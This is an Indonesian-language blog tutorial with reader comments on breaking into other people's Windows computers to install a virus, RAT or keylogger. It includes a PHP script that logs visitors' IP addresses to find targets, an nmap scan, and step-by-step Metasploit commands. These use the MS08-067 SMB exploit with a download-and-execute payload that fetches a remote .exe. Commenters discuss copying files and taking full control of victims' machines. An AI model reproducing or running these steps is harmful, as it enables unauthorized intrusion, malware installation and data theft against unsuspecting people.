waduh baru kaku juga tangan ne ga nulis...sekarang bakal update lagi ne o2nri2nya,,,ok lanjut...
ni tutorial ngebahas tentang gimana cara nya kita nginfect ip seseorang lewat metasploit jadi dengan gitu kita memasang program , virus,worm,RAT,keylogger atau apa aja terserah anda,
ok lanjut
di sini kita membutuhkan dua tool yg mungkin kalian semua udah pada g asing lagi lah ama tool ini
yaitu
METASPLOIT
NMAP
hal yg paling pertama kita lakukan tentu saja mencari target
yah kalo target nya dalam jaringan lokal kalian bisa menggunakan berbagai tool ip scanner kan itu sih gampang, ,,
nah kalo pngen tau ip orang di internet gimana ?
nih cuman ngasih pencerahan dikit
kita bkin dlu suatu script php untuk menangkap ip adress dari pengunjung yg membuka script itu
nih script nya
<? $file = "ip.txt"; $ip = $_SERVER['REMOTE_ADDR']; $handle = fopen($file, 'a'); fwrite($handle, "IP Address: "); fwrite($handle, "$ip"); fwrite($handle, "\n"); fclose($handle); ?>
ok lanjut kalo dah dapet ip kita lanjut buka metasploit
1. sebelum nya kita harus membuat dulu database dengan cara
ketik db_create pada metasploit
2. lalu kta scan ip target menggunakan nmap dengan cara ketik nmap pada metasploit lalu ketik nmap -sT -sV target ip
telah scanning beres nanti kita akan mendapatkan beberapa informasi, bila di dalam nya ada informasi berkaitan dengan windows 2000,(xp sp1,sp2,sp3) berarti kita bisa menginfect ip tersebut tanpa masalah
3. dalam metasploit ketik use windows/smb/ms08_067_netapi
lalu ketik 'set target 0'
'show payloads'
'set payload windows/download_exec'
show options
set RHOST target IP
nah setelah itu disini bagian terpenting nya program apa yg ingin kita infect ke ip(komputer) tersebut.
apa kah kita akan menginfeksikan suatu virus,worm,RAT,keylogger,atau apa saja terserah anda
kita ketik set url http://www.site.com/xxx.exe
dan akhir nya kita ketik exploit
wah bisa explorasi gak nih mas ... ke data datanya ... seperti copy file yang ada n berbuat sesuka hati d komputer target ???
untlock@yahoo.com
udah CTRL + D :D
pekerjaan trojan ya ???
control penuh dah compi orang,, semaunya coba aja,,
untuk download exploit ada di posting ini om
http://o2nri2.blogspot.com/2010/11/350-release-notes-metasploit-statistik.html
payload2 terbarunya freebsd ada gak om ?? btw koment balok di blog gw yak :)
klo mainnya di lokal masih bs di trima logika.,.:)
tp klo sudah ngambil IP public truz nyerang IP publicnya...hhhmmm.,..
ga masuk akal dch kyx.,.:p
secara ada berapa komputer yg ada di IP publicnya ntu???
IP public(utk keluar)>>>IP private(utk komputer lokalan)....tiap2 kompter hanya dapat IP private, lain halnya klo server...:)